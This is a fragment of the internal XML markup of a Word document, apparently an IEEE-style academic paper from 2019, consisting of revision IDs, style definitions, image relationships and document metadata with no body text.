    <w:rsid w:val="00B075F1"/>
    <w:rsid w:val="00B11EE2"/>
    <w:rsid w:val="00B160C4"/>
    <w:rsid w:val="00B26F40"/>
    <w:rsid w:val="00B27D61"/>
    <w:rsid w:val="00B45AFD"/>
    <w:rsid w:val="00B47C8D"/>
    <w:rsid w:val="00B47EFD"/>
    <w:rsid w:val="00B511AE"/>
    <w:rsid w:val="00B51C9E"/>
    <w:rsid w:val="00B5303B"/>
    <w:rsid w:val="00B56FCD"/>
    <w:rsid w:val="00B61033"/>
    <w:rsid w:val="00B619C4"/>
    <w:rsid w:val="00B62A76"/>
    <w:rsid w:val="00B67646"/>
    <w:rsid w:val="00B72666"/>
    <w:rsid w:val="00B72C52"/>
    <w:rsid w:val="00B768DD"/>
    <w:rsid w:val="00B77EF4"/>
    <w:rsid w:val="00B80A9B"/>
    <w:rsid w:val="00B84AAE"/>
    <w:rsid w:val="00B851F3"/>
    <w:rsid w:val="00B859D4"/>
    <w:rsid w:val="00B952D8"/>
    <w:rsid w:val="00B96EC4"/>
    <w:rsid w:val="00B9708C"/>
    <w:rsid w:val="00BA3675"/>
    <w:rsid w:val="00BA44DE"/>
    <w:rsid w:val="00BA6FC9"/>
    <w:rsid w:val="00BB3B10"/>
    <w:rsid w:val="00BB592E"/>
    <w:rsid w:val="00BB5B08"/>
    <w:rsid w:val="00BC0CFB"/>
    <w:rsid w:val="00BC6451"/>
    <w:rsid w:val="00BC6F1A"/>
    <w:rsid w:val="00BD00C6"/>
    <w:rsid w:val="00BD098B"/>
    <w:rsid w:val="00BD1D63"/>
    <w:rsid w:val="00BD2ABF"/>
    <w:rsid w:val="00BD31F1"/>
    <w:rsid w:val="00BE00CE"/>
    <w:rsid w:val="00BE6774"/>
    <w:rsid w:val="00BF3FC2"/>
    <w:rsid w:val="00C03291"/>
    <w:rsid w:val="00C05A1F"/>
    <w:rsid w:val="00C10431"/>
    <w:rsid w:val="00C13921"/>
    <w:rsid w:val="00C16A00"/>
    <w:rsid w:val="00C22901"/>
    <w:rsid w:val="00C247A6"/>
    <w:rsid w:val="00C26BF5"/>
    <w:rsid w:val="00C27241"/>
    <w:rsid w:val="00C35CC1"/>
    <w:rsid w:val="00C36AD8"/>
    <w:rsid w:val="00C408FB"/>
    <w:rsid w:val="00C4377A"/>
    <w:rsid w:val="00C446AD"/>
    <w:rsid w:val="00C55BC5"/>
    <w:rsid w:val="00C60BEB"/>
    <w:rsid w:val="00C6141C"/>
    <w:rsid w:val="00C65EE2"/>
    <w:rsid w:val="00C67A58"/>
    <w:rsid w:val="00C71A96"/>
    <w:rsid w:val="00C72F5A"/>
    <w:rsid w:val="00C7509A"/>
    <w:rsid w:val="00C76D58"/>
    <w:rsid w:val="00C775CD"/>
    <w:rsid w:val="00C821D4"/>
    <w:rsid w:val="00C845A3"/>
    <w:rsid w:val="00C93951"/>
    <w:rsid w:val="00C95E0B"/>
    <w:rsid w:val="00CA32D1"/>
    <w:rsid w:val="00CA578C"/>
    <w:rsid w:val="00CB162C"/>
    <w:rsid w:val="00CB165F"/>
    <w:rsid w:val="00CB3215"/>
    <w:rsid w:val="00CB4C99"/>
    <w:rsid w:val="00CB4FBD"/>
    <w:rsid w:val="00CB74BC"/>
    <w:rsid w:val="00CC1A6D"/>
    <w:rsid w:val="00CC313A"/>
    <w:rsid w:val="00CE14DA"/>
    <w:rsid w:val="00CE354A"/>
    <w:rsid w:val="00CE3884"/>
    <w:rsid w:val="00CE3B36"/>
    <w:rsid w:val="00CE58D8"/>
    <w:rsid w:val="00CE5AE7"/>
    <w:rsid w:val="00CE65D8"/>
    <w:rsid w:val="00CF1AEC"/>
    <w:rsid w:val="00CF2B30"/>
    <w:rsid w:val="00CF3C74"/>
    <w:rsid w:val="00CF48EA"/>
    <w:rsid w:val="00CF5851"/>
    <w:rsid w:val="00CF5DCC"/>
    <w:rsid w:val="00D00B23"/>
    <w:rsid w:val="00D16A07"/>
    <w:rsid w:val="00D21306"/>
    <w:rsid w:val="00D2141E"/>
    <w:rsid w:val="00D26F1B"/>
    <w:rsid w:val="00D33F4E"/>
    <w:rsid w:val="00D54EF0"/>
    <w:rsid w:val="00D57C94"/>
    <w:rsid w:val="00D57F66"/>
    <w:rsid w:val="00D60F59"/>
    <w:rsid w:val="00D63C89"/>
    <w:rsid w:val="00D65AC1"/>
    <w:rsid w:val="00D701F0"/>
    <w:rsid w:val="00D71A99"/>
    <w:rsid w:val="00D80611"/>
    <w:rsid w:val="00D82C7B"/>
    <w:rsid w:val="00D82FE1"/>
    <w:rsid w:val="00D83E75"/>
    <w:rsid w:val="00D84490"/>
    <w:rsid w:val="00D84D84"/>
    <w:rsid w:val="00D84DC9"/>
    <w:rsid w:val="00D87B36"/>
    <w:rsid w:val="00D91FCF"/>
    <w:rsid w:val="00D92B47"/>
    <w:rsid w:val="00D92EF9"/>
    <w:rsid w:val="00DA5262"/>
    <w:rsid w:val="00DA5917"/>
    <w:rsid w:val="00DA749C"/>
    <w:rsid w:val="00DB5F7A"/>
    <w:rsid w:val="00DC04BD"/>
    <w:rsid w:val="00DC3448"/>
    <w:rsid w:val="00DC4069"/>
    <w:rsid w:val="00DC7067"/>
    <w:rsid w:val="00DD2730"/>
    <w:rsid w:val="00DD5E38"/>
    <w:rsid w:val="00DD5F78"/>
    <w:rsid w:val="00DE0354"/>
    <w:rsid w:val="00DE76EB"/>
    <w:rsid w:val="00DF489B"/>
    <w:rsid w:val="00DF4A23"/>
    <w:rsid w:val="00DF798E"/>
    <w:rsid w:val="00E04BFF"/>
    <w:rsid w:val="00E11EE2"/>
    <w:rsid w:val="00E11F62"/>
    <w:rsid w:val="00E12438"/>
    <w:rsid w:val="00E168F2"/>
    <w:rsid w:val="00E224AF"/>
    <w:rsid w:val="00E3207D"/>
    <w:rsid w:val="00E3559E"/>
    <w:rsid w:val="00E4423A"/>
    <w:rsid w:val="00E5012C"/>
    <w:rsid w:val="00E60D51"/>
    <w:rsid w:val="00E80225"/>
    <w:rsid w:val="00E8174E"/>
    <w:rsid w:val="00E862F2"/>
    <w:rsid w:val="00E9447D"/>
    <w:rsid w:val="00EA31DF"/>
    <w:rsid w:val="00EA4899"/>
    <w:rsid w:val="00EA7661"/>
    <w:rsid w:val="00EB02C4"/>
    <w:rsid w:val="00EB2085"/>
    <w:rsid w:val="00EB29B1"/>
    <w:rsid w:val="00EB2B8E"/>
    <w:rsid w:val="00EB7A4B"/>
    <w:rsid w:val="00EC1185"/>
    <w:rsid w:val="00EC1728"/>
    <w:rsid w:val="00EC662B"/>
    <w:rsid w:val="00EC7A7B"/>
    <w:rsid w:val="00ED0403"/>
    <w:rsid w:val="00ED4E82"/>
    <w:rsid w:val="00ED555E"/>
    <w:rsid w:val="00ED6F4D"/>
    <w:rsid w:val="00EE38A1"/>
    <w:rsid w:val="00EE4604"/>
    <w:rsid w:val="00EF7352"/>
    <w:rsid w:val="00F04738"/>
    <w:rsid w:val="00F04EEE"/>
    <w:rsid w:val="00F05649"/>
    <w:rsid w:val="00F104D8"/>
    <w:rsid w:val="00F1502D"/>
    <w:rsid w:val="00F16F30"/>
    <w:rsid w:val="00F22121"/>
    <w:rsid w:val="00F30016"/>
    <w:rsid w:val="00F30113"/>
    <w:rsid w:val="00F40AA9"/>
    <w:rsid w:val="00F4755E"/>
    <w:rsid w:val="00F475B8"/>
    <w:rsid w:val="00F56BCC"/>
    <w:rsid w:val="00F60D8C"/>
    <w:rsid w:val="00F65666"/>
    <w:rsid w:val="00F659AB"/>
    <w:rsid w:val="00F67491"/>
    <w:rsid w:val="00F72838"/>
    <w:rsid w:val="00F75EA6"/>
    <w:rsid w:val="00F7673D"/>
    <w:rsid w:val="00F818E2"/>
    <w:rsid w:val="00F83130"/>
    <w:rsid w:val="00F84047"/>
    <w:rsid w:val="00F91D77"/>
    <w:rsid w:val="00FA088A"/>
    <w:rsid w:val="00FA2384"/>
    <w:rsid w:val="00FB10C7"/>
    <w:rsid w:val="00FB4B6A"/>
    <w:rsid w:val="00FC05B5"/>
    <w:rsid w:val="00FD2FA7"/>
    <w:rsid w:val="00FD4D5F"/>
    <w:rsid w:val="00FD5A2F"/>
    <w:rsid w:val="00FD5F23"/>
    <w:rsid w:val="00FD6C79"/>
    <w:rsid w:val="00FE2393"/>
    <w:rsid w:val="00FE6E2C"/>
    <w:rsid w:val="00FF1C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55B3C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3B7679DE-E817-4A66-8FB2-2FB3002C2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C95"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="006B7C95"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="216"/>
      </w:tabs>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:qFormat/>
    <w:rsid w:val="006B7C95"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="120" w:after="60"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:qFormat/>
    <w:rsid w:val="006B7C95"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:line="240" w:lineRule="exact"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:qFormat/>
    <w:rsid w:val="006B7C95"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:spacing w:before="40" w:after="40"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iC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7C95"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:smallCaps/>
      <w:noProof/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:rsid w:val="006B7C95"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:noProof/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:rsid w:val="006B7C95"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:noProof/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:rsid w:val="006B7C95"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:noProof/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Abstract">
    <w:name w:val="Abstract"/>
    <w:rsid w:val="006B7C95"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Affiliation">
    <w:name w:val="Affiliation"/>
    <w:qFormat/>
    <w:rsid w:val="006B7C95"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Author">
    <w:name w:val="Author"/>
    <w:rsid w:val="006B7C95"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="40" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:noProof/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00403E69"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00403E69"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00403E69"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00403E69"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00403E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3E69"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="SimSun" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00403E69"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00403E69"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C247A6"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C247A6"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00CB165F"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Footer1">
    <w:name w:val="Footer1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Footer"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002010EA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="002010EA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002010EA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar1">
    <w:name w:val="Footer Char1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="002010EA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSu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1402172">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2046830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www.facebook.com" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.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footer" Target="footer1.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.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6EFD4A-50BB-4D1B-8904-26A4DD77B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4760</TotalTime>
  <Pages>32</Pages>
  <Words>58337</Words>
  <Characters>332527</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>2771</Lines>
  <Paragraphs>780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Lawrence</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Carlene Campbell</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-22T09:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-14T18:10:00Z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778bfe36-30dd-3c48-a674-8ce0d800a967</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="24" name="Mendeley Citation Style_1">
    <vt:lpwstr>http://www.zotero.org/styles/ieee</vt:lpwstr>
  </property>
</Properties>
</file>